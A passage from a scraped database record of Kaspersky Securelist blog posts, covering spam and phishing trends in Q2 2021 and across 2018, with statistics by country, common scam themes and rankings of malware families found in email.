mailings from popular cloud services. This technique has been used many times before. A fake notification about a Microsoft Teams meeting or a request to view an important document traditionally takes the victim to a phishing login page asking for corporate account credentials.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/08/03142238/Spam_and_phishing_in_Q2_2021_01.png>)\n\nCybercriminals also faked emails from cloud services in schemes aimed at stealing not accounts but money. We saw, for example, spoofed messages about a comment added to a document stored in the cloud. The document itself most likely did not exist: at the other end of the link was the usual recipe for making a fast buck online by investing in Bitcoin or a similarly tempting offer. Such &quot;offers&quot; usually require the victim to pay a small amount upfront to claim their non-existent reward.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/08/03142307/Spam_and_phishing_in_Q2_2021_02.png>)\n\nIn addition to various cloud-related emails, we blocked messages disguised as business correspondence and containing links to malware. In particular, an email threatening legal action claimed that the victim had not paid for a completed order. To resolve the issue amicably, the recipient was asked to review the documents confirming the order completion and to settle the bill by a certain date. The documents were supposedly available via the link provided and protected by a special code. In fact, the file named &quot;\u0414\u043e\u0433\u043e\u0432\u043e\u0440 \u21168883987726 \u043e\u0442 10.10.2021.pdf.exe&quot; (Agreement #8883987726 of 10.10.2021.pdf.exe) that the victim was asked to download was a malicious program known as Backdoor.Win32.RWS.a.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/08/03142335/Spam_and_phishing_in_Q2_2021_03.png>)\n\n### COVID-19 compensation fraud\n\nIn Q2 2021, scammers continued to exploit the theme of pandemic-related compensation. This time, offers of financial assistance were mostly sent in the name of government agencies. &quot;The UK Government&quot; and &quot;the US Department of the Treasury&quot; were ready to pay out special grants to all-comers. However, attempts to claim the promised handout only led to monetary loss or compromised bank card details. It goes without saying that the grants did not materialize.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/08/03142357/Spam_and_phishing_in_Q2_2021_04.png>)\n\nIt was bank card details, including CVV codes, that were the target of a gang of cybercriminals who created a fake informational website about social assistance for citizens of Belarus. To make the pages look official, the scammers described in detail the system of payouts depending on the applicant&#x27;s line of work and other conditions. The information bulletin issued in the name of the Belarus Ministry of Health clearly spelled out the payment amounts for medical staff. Workers in other fields were invited to calculate their entitled payout by clicking the Get Social Assistance button. This redirected the visitor to a page with a form for entering bank card details.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/08/03142425/Spam_and_phishing_in_Q2_2021_05.png>)\n\n### Parcel scam: buy one, get none\n\nUnexpected parcels requiring payment by the recipient remained one of the most common tricks this past quarter. Moreover, cybercriminals became more adept at localizing their notifications: Q2 saw a surge in mass mailings in a range of languages. The reason for the invoice from the &quot;mail company&quot; could be anything from customs duties to shipment costs. When trying to pay for the service, as with compensation fraud, victims were taken to a fake website, where they risked not only losing the amount itself (which could be far higher than specified in the email), but also spilling their bank card details.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/08/03142509/Spam_and_phishing_in_Q2_2021_06.png>)\n\nMailed items were the focus of one other fraudulent scheme. Websites appeared offering people the chance to buy out others&#x27; parcels that for some reason could not reach the intended recipients. The &quot;service&quot; was positioned as a lottery \u2014 the buyer paid only for the weight of the parcel (the bigger it was, the higher the price), and its contents were not disclosed. To find out what was inside, the lucky owner of the abandoned parcel had to wait for it to arrive at the specified address. Which it didn&#x27;t. According to the mail company Russian Post, when the storage period expires, registered items (parcels, letters, postcards, EMS items) are sent to the return address at the sender&#x27;s expense. If the sender does not collect the returned item within the storage period, it is considered &quot;unclaimed&quot; and stored for a further six months, after which it is destroyed. In other words, ownerless parcels are not sold. Therefore, any offer to buy them is evidently a scam.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/08/03142815/Spam_and_phishing_in_Q2_2021_07.png>)\n\n### New movies: pay for the pleasure of not watching\n\nLate April saw the annual Oscars ceremony in Hollywood. Movies nominated for an Academy award naturally attract public as well as cybercriminal attention. As a consequence, fake websites popped up offering free viewings and even downloads of Oscar contenders. After launching a video, the visitor of the illegal movie theater was shown several clips of the film (usually taken from the official trailer), before being asked to pay a small subscription fee to continue watching. However, after payment of the &quot;subscription&quot; the movie screening did not resume; instead the attackers had a new bank account to play with.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/08/03142842/Spam_and_phishing_in_Q2_2021_08.png>)\n\nIn fact, almost any big-budget movie is accompanied by the appearance of fake websites offering video or audio content long before its official release. Kaspersky found fake sites supposedly hosting _Friends: The Reunion_, a special episode of the popular sitcom. Fans who tried to watch or download the long-awaited continuation were redirected to a Columbia Pictures splash screen. After a few seconds, the broadcast stopped, replaced by a request to pay a nominal fee.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/08/03142917/Spam_and_phishing_in_Q2_2021_09.png>)\n\n### Messenger spam: WhatsApp with that?\n\nIn messenger-based spam, we continued to observe common tricks to get users to part with a small amount of money. Victims were asked, for example, to take a short survey about WhatsApp and to send messages to several contacts in order to receive a prize. Another traditional scam aims to persuade the user that they are the lucky winner of a tidy sum. Both scenarios end the same way: the scammers promise a large payout, but only after receiving a small commission.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/08/03143055/Spam_and_phishing_in_Q2_2021_10.png>)\n\nWhatsApp was bought by Facebook in 2014. In early 2021, the two companies&#x27; symbiotic relationship became a hot topic in connection with [WhatsApp&#x27;s new privacy policy](<https://www.wired.com/story/whatsapp-facebook-data-share-notification/>), allowing the messenger to exchange user information with its parent company. Cybercriminals took advantage of the rumor mill about the two companies. They set up fake websites inviting users to a WhatsApp chat with &quot;beautiful strangers&quot;. But when attempting to enter the chat room, the potential victim landed on a fake Facebook login page.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/08/03143123/Spam_and_phishing_in_Q2_2021_11.png>)\n\nEmails with a link pointing to a fake WhatsApp voice message most likely belong to the same category. By following it, the recipient risks not only handing over their personal data to the attackers, but also downloading malware to their computer or phone.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/08/03143142/Spam_and_phishing_in_Q2_2021_12.png>)\n\n### Investments and public property scams\n\nOffers of quick earnings with minimal effort remain one of the most common types of fraud. In Q2 2021, cybercriminals diversified their easy-money schemes. Email recipients were invited to invest in natural resources (oil, gas, etc.) or cryptocurrency secured by these resources. The topic of gas surfaced also in more conventional compensation scams. To make their offers more credible, cybercriminals used the brands of large companies. Having accepted investments, the scammers and their sites quickly disappeared along with the victims&#x27; money.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/08/03143159/Spam_and_phishing_in_Q2_2021_13.png>)\n\nFor more suspicious minds, the cybercriminals set up a fake Gazprom anti-fraud website, where they posed as company employees, promising to compensate victims&#x27; losses. The cybercriminals claimed that those who had paid more than 60,000 rubles were entitled to compensation; however, the attacks were not targeted. Most likely, the scammers were counting on users being curious about whether they could claim compensation. Naturally, the help of the &quot;anti-fraudsters&quot; was not without strings attached, despite the advertised free consultation. &quot;Clients&quot; who filled out the form were asked to pay a small fee for the refund, whereupon the &quot;consultants&quot; vanished without compensating so much as a dime.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/08/03143221/Spam_and_phishing_in_Q2_2021_14.png>)\n\nAnother high-earning scam cited client payouts under VTB Invest, VTB Bank&#x27;s digital asset management solution. Using the bank&#x27;s logos, the fraudsters offered &quot;active banking users&quot; the opportunity to receive &quot;payout from investors.&quot; After filling out the application form, indicating name, phone number and email, the potential victim saw a message stating that they are to receive a certain amount of money. Although the cybercriminals assured that no commission was payable, to receive the &quot;payout&quot; the applicant was required to provide bank card details or deposit a small sum, ostensibly to verify the account. In other words, it was the usual scheme in a different wrapper.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/08/03143316/Spam_and_phishing_in_Q2_2021_15.png>)\n\n## Statistics: spam\n\n### Proportion of spam in mail traffic\n\nAfter a prolonged decline, the share of spam in global mail traffic began to grow again in Q2 2021, averaging 46.56%, up 0.89 p.p. against the previous reporting period.\n\n_Share of spam in global mail traffic, Q1 and Q2 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/08/03144632/01-en-spam-report-q2-2021.png>))_\n\nA look at the data by month shows that, having troughed in March (45.10%), the share of spam in global mail traffic rose slightly in April (45.29%), with further jumps in May (46.35%) and June (48.03%), which is comparable to Q4 2020.\n\n### Source of spam by country\n\nThe TOP 10 spam-source countries remained virtually unchanged from the first quarter. Russia (26.07%) is still in first place, its share having increased by 3.6 p.p., followed by Germany (13.97%) and the US (11.24%), whose contribution to the global flow of spam decreased slightly. China (7.78%) remains in fourth position.\n\n_Source of spam by country, Q2 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/08/03144703/03-en-spam-report-q2-2021.png>))_\n\nThe Netherlands (4.52%), France (3.48%) and Spain (2.98%) held on to fifth, sixth and seventh, respectively. Only the last three positions in the TOP 10 experienced a slight reshuffle: Poland (1.69%) dropped out of the ranking, falling to 11th place, while Japan (2.53%) moved up to eighth. Brazil (2.27%) remained in ninth spot, while the last line in the ranking was claimed by India (1.70%).\n\n### Malicious mail attachments\n\nMail Anti-Virus blocked 34,224,215 malicious attachments in Q2, almost 4 million fewer than in the first three months of 2021.\n\n_Number of Mail Anti-Virus triggerings, Q1 and Q2 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/08/03144738/04-en-spam-report-q2-2021.png>))_\n\nPeak malicious activity came in June, when Kaspersky solutions blocked more than 12 million attachments, while May was the quietest with only 10.4 million.\n\n#### Malware families\n\nIn Q2, Trojans from the [Badun](<https://threats.kaspersky.com/en/threat/Trojan.Win32.Badun/>) family (7.09%) were the most common malicious attachments in spam, with their share increased by 1.3 p.p. These malicious programs, disguised as electronic documents, are often distributed in archives. In contrast, [Agesla](<https://threats.kaspersky.com/en/threat/Trojan-PSW.MSIL.Agensla/>) Trojans (6.65%), which specialize in stealing credentials, shed 2.26 p.p. and dropped to second place. The [Taskun](<https://threats.kaspersky.com/en/threat/Trojan.MSIL.Taskun/>) family (4.25%), which exploits Windows Task Scheduler, rounds out the TOP 3. These Trojans, like Badun, are gaining popularity.\n\n_TOP 10 malware families in mail traffic, Q2 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/08/03144835/05-en-spam-report-q2-2021.png>))_\n\nExploits for [CVE-2017-11882](<https://threats.kaspersky.com/en/threat/Exploit.MSOffice.CVE-2017-11882/>) (4.07%), an Equation Editor vulnerability popular with cybercriminals, gave ground and dropped to fourth place. Next come malicious [ISO](<https://threats.kaspersky.com/en/threat/Trojan.Win32.ISO/>) disk images (3.29%). Sixth and eighth places were occupied by Noon spyware Trojans, which infect [any](<https://threats.kaspersky.com/en/threat/Trojan-Spy.MSIL.Noon/>) (2.66%) or [only 32-bit](<https://threats.kaspersky.com/en/threat/Trojan-Spy.Win32.Noon/>) (2.47%) versions of Windows. [Androm](<https://threats.kaspersky.com/en/threat/Backdoor.MSIL.Androm/>) backdoors (2.55%) lie in seventh position, while the TOP 10 is rounded out by malicious documents in the [SAgent](<https://threats.kaspersky.com/en/threat/Trojan.MSOffice.SAgent/>) (2.42%) and [Agent](<https://threats.kaspersky.com/en/threat/Trojan-Downloader.MSOffice.Agent/>) (2.11%) families.\n\n_TOP 10 malicious attachments, Q2 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/08/03144904/06-en-spam-report-q2-2021.png>))_\n\nThe TOP 10 attachments in spam differs only slightly from the ranking of malware families. The most widespread representative of Agent family fell short of the TOP 10, but the ranking did find room for a Trojan from the [Crypt](<https://threats.kaspersky.com/en/threat/Trojan.MSIL.Crypt/>) family (2.06%), which includes heavily [obfuscated](<https://encyclopedia.kaspersky.com/glossary/obfuscation/?utm_source=securelist&utm_medium=blog&utm_campaign=termin-explanation>) and encrypted programs.\n\n### Countries targeted by malicious mailings\n\nMore than anywhere else, Kaspersky solutions blocked malicious attachments on user devices in Spain (9.28%). The share of this country grew slightly against Q1 2021, adding 0.54 p.p. Second place was retained by Italy (6.38%), despite losing 1.21 p.p. Germany (5.26%) and Russia (5.82%) swapped places in Q2, while the UAE (5.36%) remained fourth, its share practically unchanged.\n\n_Countries targeted by malicious spam, Q2 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/08/03144933/07-en-spam-report-q2-2021.png>))_\n\nFurther down in the Top 10 countries by number of users who came across malicious attachments in Q2 2021 are Vietnam (4.71%), Mexico (4.23%), Turkey (3.43%), Brazil (2.91%) and Malaysia (2.53%).\n\n## Statistics: phishing\n\nIn phishing terms, Q2 2021 was fairly uneventful. The Anti-Phishing system detected and blocked 50,398,193 attempted redirects, with only 3.87% of our users encountering such phishing links.\n\n### Geography of phishing attacks\n\nLooking at the share of users by country on whose devices the Anti-Phishing system was triggered, we see that Brazil (6.67%), which lost first place last quarter, is back at the top. It didn&#x27;t get far ahead from Israel (6.55%) and France (6.46%), which topped the Q1 list.\n\n_Geography of phishing attacks, Q2 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/08/03145007/08-en-spam-report-q2-2021.png>))_\n\n### Top-level domains\n\nThe traditional leader among top-level domain zones used by cybercriminals to post phishing pages is COM (31.67%). The ORG domain (8.79%) moved up to second place, pushing XYZ (8.51%) into third.\n\n_Top-level domain zones most commonly used for phishing, Q2 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/08/03145039/09-en-spam-report-q2-2021.png>))_\n\nThe fourth most popular domain zone among cybercriminals in Q2 was China&#x27;s CN (3.77%), followed by NET (3.53%). Russia&#x27;s RU (2.98%) dropped to sixth place, and Tokelau&#x27;s TK (1.65%) to eighth. Note also the cybercriminals&#x27; preference for international domain zones (six of the ten lines in this quarter&#x27;s ranking).\n\n### Organizations under attack\n\n_The rating of organizations targeted by phishers is based on the triggering of the deterministic component in the Anti-Phishing system on user computers. The component detects all pages with phishing content that the user has tried to open by following a link in an email message or on the web, as long as links to these pages are present in the Kaspersky database._\n\nFor the first time since the start of the pandemic, online stores (19.54%) vacated the first line in the ranking of organizations most often used by cybercriminals as bait. Global internet portals (20.85%) stepped in as this quarter&#x27;s leader. Moreover, the share of both categories increased relative to Q1: by 3.77 and 5.35 p.p., respectively. Third place belongs to banks (13.82%), which gained 3.78 p.p. in Q2.\n\n_Distribution of organizations whose users were targeted by phishers, by category, Q2 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/08/03145107/10-en-spam-report-q2-2021.png>))_\n\nOverall, the list of the most popular organization categories among cybercriminals remained practically unchanged since the previous quarter, except that the shares of instant messengers (6.27%) and social networks (7.26%) almost drew level, and phishers preferred financial services (2.09%) to IT companies (1.68%).\n\n## Conclusion\n\nIn Q2, as we expected, cybercriminals continued to hunt for corporate account credentials and exploit the COVID-19 theme. A curious takeaway was the spike in investment-related activity. On the whole, however, the quarter did not deliver any surprises.\n\nAs for Q3 forecasts, the share of cyberattacks on the corporate sector is likely to stay the same. This is because remote working has established a firm foothold in the labor market. Also, the COVID-19 topic is unlikely to disappear from spam. And if the current crop of vaccination and compensation scams weren&#x27;t enough, fraudsters could start utilizing newly identified strains of the virus to add variety and nowness to their schemes. What&#x27;s more, during the vacation season, pandemic or not, we expect an increase in demand for intercity and international travel; as a result, the risk of encountering fake websites when buying tickets or booking accommodation will rise. Lastly, we will likely see waves of tourist-targeted attacks during major sporting occasions, such as the Olympic Games in Japan. Such events are always accompanied by thematic spam.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-08-05T10:00:45", "type": "securelist", "title": "Spam and phishing in Q2 2021", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11882"], "modified": "2021-08-05T10:00:45", "id": "SECURELIST:A4072107882E39592149B0DB12585D70", "href": "https://securelist.com/spam-and-phishing-in-q2-2021/103548/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-03-12T10:51:16", "description": "\n\n## Numbers of the year\n\n * The share of spam in mail traffic was 52.48%, which is 4.15 p.p. less than in 2017.\n * The biggest source of spam this year was China (11.69%).\n * 74.15% of spam emails were less than 2 KB in size.\n * Malicious spam was detected most commonly with the Win32.CVE-2017-11882 verdict.\n * The Anti-Phishing system was triggered 482,465,211 times.\n * 18.32% of unique users encountered phishing.\n\n## Global events and spam\n\n### GDPR\n\nIn the [first months of the year](<https://securelist.com/spam-and-phishing-in-q2-2018/87368/#gdpr-kak-povod-dlya-fishinga>) alone, we registered a great many emails in spam traffic connected in some way to the EU General Data Protection Regulation (GDPR). It was generally B2B spam \u2014 mostly invitations to paid seminars, webinars, and workshops promising to explain the ins and outs of the new regulation and its ramifications for business.\n\nDuring this period, there was an upturn in legitimate mailings too. Following the requirements of the regulation, companies sent out notifications on the transition to the GDPR policy requesting user consent to store and process personal data. Unsurprisingly, scammers tried to take advantage. Seeking to gain access to the personal data of clients of well-known companies, they sent out GDPR-related phishing emails prompting to update account information. Users who followed the link in the message and entered the required data immediately had it stolen by the fraudsters. It is worth noting that cybercriminals were interested largely in the data of clients of financial organizations and companies providing IT services.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/03/11144832/190311-spam-report-2018-1.png>)\n\n \n_Phishing emails exploiting the GDPR topic_\n\n### 2018 FIFA World Cup\n\nThe [FIFA World Cup](<https://securelist.com/2018-fraud-world-cup/85878/>) was one of the main media events of the year, reaching far beyond the world of sport. Scammers exploited the World Cup topic using a variety of classic deception methods based on social engineering. Cybercriminals created fake FIFA partner websites to gain access to victims' bank accounts, carried out targeted attacks, and set up fake login pages for fifa.com accounts.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/03/11144859/190311-spam-report-2018-2.png>)\n\n \n_Examples of messages with World Cup ticket and trip giveaways_\n\n### New iPhone launch\n\nAs is now customary, Apple's unveiling of its latest device caused a [spike in spam](<https://securelist.com/spam-and-phishing-in-q3-2018/88686/#vyxod-novogo-iphone>) sent, supposedly, from Chinese companies offering accessories and replica gadgets. Such messages redirect the recipient to newly created, generic online stores, which willingly accept payments, but are not so great when it comes to dispatching goods.\n\nThe release coincided with a slight rise in the number of phishing messages exploiting the Apple brand (and its services), and emails with malicious attachments:\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/03/11144926/190311-spam-report-2018-3.png>)\n\n### Malware and the corporate sector\n\nIn 2018, the number of malicious messages in spam was 1.2 times less than in 2017; Mail Anti-Virus was triggered a total of 120,310,656 times among Kaspersky Lab clients.\n\n_Number of Mail Anti-Virus triggerings among Kaspersky Lab clients in 2018_[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/03/11151004/en-viruses-in-mail.png>)\n\n2018 saw a continuation of the trend for attention to detail in email presentation. Cybercriminals imitated actual business correspondence using the companies' real details, including signatures and logos. To bypass security solutions (and convince users that files were safe), ISO, IQY, PIF, and PUB attachments were used, all [non-typical formats for spam](<https://securelist.com/spam-and-phishing-in-q2-2018/87368/#vredonosnye-iqy-vlozheniya>).\n\nCredit organizations remain one of the most popular targets, and this trend is likely to continue in 2019. We also expect an increase in the number of attacks on the corporate sector as a whole.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/03/11144953/190311-spam-report-2018-4.png>)\n\n### New distribution channels\n\nWe have mentioned before that the distribution of phishing and other fraudulent content has gone beyond the scope of mailings. Scammers are not only testing new means of delivery, but getting victims themselves to distribute malicious content. Some of this year's most massive attacks we registered in messengers and social networks.\n\n\"Self-propagating\" phishing messages are similar to long-forgotten [chain letters](<https://en.wikipedia.org/wiki/Chain_letter>). They refer to non-existent giveaways or free lucrative offers, with one of the conditions for participation being to forward the message to friends or publish it on social media. At the start of the year, scammers used free air ticket lotteries as a bait, before switching to mailings supposedly from popular retail chains, restaurants, stores, and coffee bars. WhatsApp was the most common tool for distributing such messages.\n\n### Cryptocurrencies and spam\n\nIn 2018, far from waning, spammers' interest in cryptocurrencies rose. Among the spam messages were fraudulent ones attempting to coerce potential victims into transferring money to cryptocurrency wallets.\n\nOne of the most popular kinds of fraud seen last year was \"sextortion.\" This type of ransom scam is based on the claim to be in possession of private information of an intimate nature. To avoid disclosure, the victim is told to transfer money to the cryptocurrency wallet specified in the message, which often looks very convincing and uses the victim's actual personal data: name, passwords, phone numbers, etc. Against the backdrop of endless news reports about personal data leaks, such threats, backed up by real details, cause victims to panic and give in to the cybercriminals' demands. Last year, the ransom sum ranged from a few hundred to several thousand dollars.\n\nInitially, the mailings were aimed at an English-speaking audience, but at the end of Q3 we registered a wave of messages in other languages: German, Italian, Arabic, Japanese, French, Greek, and others.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/03/11145029/190311-spam-report-2018-5.png>)\n\nNeither did the scammers forget about other fraud methods. Over the year, we identified fraudulent mailings supposedly from large charitable organizations asking to help children by purchasing some data etc. All these schemes had a common thread: The money transfer was requested in cryptocurrency. It should be noted that such messages were very few compared with the mailings described above.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/03/11145103/190311-spam-report-2018-6.png>)\n\nIn 2019, spammers will continue to exploit the cryptocurrency topic. We expect to see more fraudulent mailings aimed at both extracting cryptocurrency and gaining access to personal accounts with various cryptocurrency services.\n\n## Phishing\n\n### Cryptocurrency\n\nCryptocurrency remains one of the most common phishing topics. In 2018, our Anti-Phishing system prevented 410,786 attempts to redirect users to phishing sites imitating popular cryptocurrency wallets, exchanges, and platforms. Fraudsters are actively creating fake login pages for cryptocurrency services in the hope of getting user credentials.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/03/11145125/190311-spam-report-2018-7.png>)\n\nAnother hot topic last year was fake ICOs. Scammers invited victims to invest in various initial coin offerings not only by email, but through social media posts as well. There was something for everyone: One of the scams, for example, targeted buzcoin, a cryptocurrency named after Russian singer Olga Buzova. The cybercrooks managed to get hold of the project mailing list and send fake presale invitations to subscribers the day before the start of the ICO. Before the bona fide organizers had time to sneeze, the attackers had scooped around $15,000.\n\nBut it was the blockchain project of Pavel Durov, TON, which had the dubious honor of most fakes back in early 2018. The cryptocurrency boom and rumors in late 2017 about an ICO from the creator of Telegram provided fertile ground. Many people believed the scammers and, despite warnings from Pavel himself on social media, transferred money to them.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/03/11145205/190311-spam-report-2018-8.png>)\n\n### Lotteries and surveys\n\nAnother way to nudge victims into transferring money is via the promise of a guaranteed [lottery win](<https://securelist.ru/easy-money-scum/92865/>) or a reward for taking part in a poll. In 2018, our security solutions blocked 3,200,180 attempted redirects to fraudulent websites offering lotteries or surveys.\n\nTo take part in the draw, users are asked to make a contribution: the more you give, the more you (supposedly) get. Survey scams work in a similar way. The victim is asked to transfer a sum of money to pay for \"administrative costs,\" after which the reward will be transferred, or so it is promised.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/03/11145239/190311-spam-report-2018-9.png>)\n\n### Universities\n\nPhishers hunt not only for money, but also for [knowledge](<https://securelist.com/phishing-for-knowledge/88268/>): Over the past year, we registered phishing attacks against 131 universities in 16 countries. More than half (83) were in the US, followed by Britain (21), and Australia and Canada (7 each). One high-profile incident was the [theft](<https://www.telegraph.co.uk/technology/2018/09/14/iranian-hackers-sell-stolen-academic-research-top-british-universities/>) of millions of documents (including nuclear energy research) from several British universities.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/03/11145314/190311-spam-report-2018-10.png>)\n\n### Taxes\n\nIn Q1 (the last quarter of the financial year in many countries), we observed a large number of phishing pages imitating the websites of HMRC (UK), the IRS (US), and other countries' tax authorities. Cybercriminals tried to finagle personal data, answers to security questions, bank account information, and other data from users. Some fake tax service sites distributed malware.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/03/11145339/190311-spam-report-2018-11.png>)\n\n \n_Fake tax service websites_\n\n### HTTPS\n\nAs we wrote a year earlier, the number of phishing pages on domains with SSL certificates has increased. Ironically, this was facilitated by the widespread adoption of HTTPS, since pages with a certificate (and padlock) are trusted far more. But getting hold of a certificate is not hard, especially for competent cybercriminals. The problem has taken on such dimensions that since September 2018 with the latest version of Chrome, the browser has stopped highlighting HTTPS sites with a green padlock in the address bar and marking them as \"Secure.\" Instead, the \"Not secure\" label is now assigned to sites without HTTPS.\n\n### Sales\n\nEvery year, November sees the start of the sales season. First up is World Shopping Day, followed by Black Friday. Cybercriminals prepare for such events in advance and commence their mass attacks long before the sales start. According to our statistics, the number of attempts to redirect users to fraudulent websites exploiting the sales topic starts to rise at the end of October.\n\nFraudsters use standard methods to extract personal data and money from victims, including fake websites mimicking popular online stores with huge discounts on expensive goods.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/03/11145406/190311-spam-report-2018-12.png>)\n\n## Statistics: spam\n\n### Proportion of spam in email traffic\n\nThe share of spam in email traffic in 2018 decreased by 4.15 p.p. to 52.48%.\n\n_Proportion of spam in global email traffic, 2018_[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/03/11150943/en-spam-in-traffic.png>)\n\nThe lowest share (47.70%) was recorded in April 2018. The highest (57.26%) belonged to December.\n\n### Sources of spam by country\n\nIn 2018, China (11.69%) led the list of spamming countries, swapping places with the US and consigning the former leader to second place with 9.04%. Third position went to Germany (7.17%), which climbed into the Top 3 from sixth.\n\nVietnam, which ranked third last year, fell to fourth place (6.09%). It was followed by Brazil (4.87%), India (4.77%), and Russia (4.29%).\n\nIn 8th place, as in 2017, came France (3.34%), while Iran and Italy departed the Top 10. They were replaced by newcomers Spain, which rose from 16th to 9th place (2.20%, +0.72 p.p.), and Britain (2.18%, +0.59 p.p.).\n\n_Sources of spam by country, 2018_[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/03/11150839/en-countries-source-spam.png>)\n\n### Spam email size\n\nIn 2018, the share of very small (up to 2 KB) messages increased significantly. Despite quarterly decline, the annual figure came in at 74.15%, up 30.75 p.p. against the previous reporting period. The proportion of 2\u20135 KB messages also increased (10.64%, +5.56 p.p.).\n\n_Spam emails by size, 2018_[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/03/11151129/spam-size.png>)\n\nThe volume of larger spam dropped significantly against 2017. The share of messages sized 5\u201310 KB (7.37%) decreased by 1.77 p.p. and 10\u201320 KB (3.66%) by 12.6 p.p. The share of spam messages sized 20\u201350 KB (2.82%) saw the biggest drop, down 18.41 p.p.\n\n### Malicious attachments in email\n\n#### Malware families\n\n_Top 10 malware families in 2018_[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/03/11151047/malware-families.png>)\n\nIn 2018, the most widely distributed malicious objects in email, assigned the **Exploit.Win32.CVE-2017-11882** verdict, exploited a Microsoft Office vulnerability for executing arbitrary code without the user's knowledge**.**\n\nIn second place was the **Backdoor.Win32.Androm** bot, whose functionality depends on additional modules downloaded at the command of the C&amp;C servers. It was most often used to download malware.\n\nThe **Trojan-PSW.Win32.Fareit** family moved up from fifth to third place. Its main task is to steal data (cookies, passwords for various FTP, mail, and other services). The harvested information is sent to the cybercriminals' server. Some members of the family are able to download and run other malware.\n\nThe **Worm.Win32.WBVB** family, which includes executable files written in Visual Basic 6 (in both P-code and Native mode) and are not trusted in KSN, remained in fourth place.\n\nFifth place went to the **Backdoor.Java.Qrat** family \u2014 cross-platform multi-functional backdoor written in Java and sold in the Darknet as a [Malware-as-a-Service (MaaS)](<https://encyclopedia.kaspersky.com/glossary/malware-as-a-service-maas/>) package. It is generally distributed by email in JAR attachments.\n\n**Trojan-Downloader.MSOffice.SLoad**, a DOC/DOCX document containing a script that can be executed in MS Word, took sixth place. It is generally used to download and install ransomware on user computers.\n\nThe spyware **Trojan-Spy.Win32.Noon** ranked seventh.\n\nThe malware **Trojan.PDF.Badur**, which consists of a PDF document containing a link to a potentially dangerous website, dropped one place to eighth.\n\nNinth place was taken by the **Trojan.BAT.Obfus** family of malicious objects \u2014 obfuscated BAT files for running malware and changing OS security settings.\n\nIn tenth place, as in the previous year, was the family of Trojan downloaders **Trojan.Win32.VBKrypt**.\n\n### Countries targeted by malicious mailshots\n\nAs in previous years, first place in 2018 went to Germany. Its share accounted for 11.51% of all attacks. Second place was taken by Russia (7.21%), and Britain (5.76%) picked up bronze.\n\n_Countries targeted by malicious mailshots, 2018_[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/03/11150900/en-countries-target-spam.png>)\n\nThe next three, separated by a whisker, were Italy (5.23%), Brazil (5.10%), and 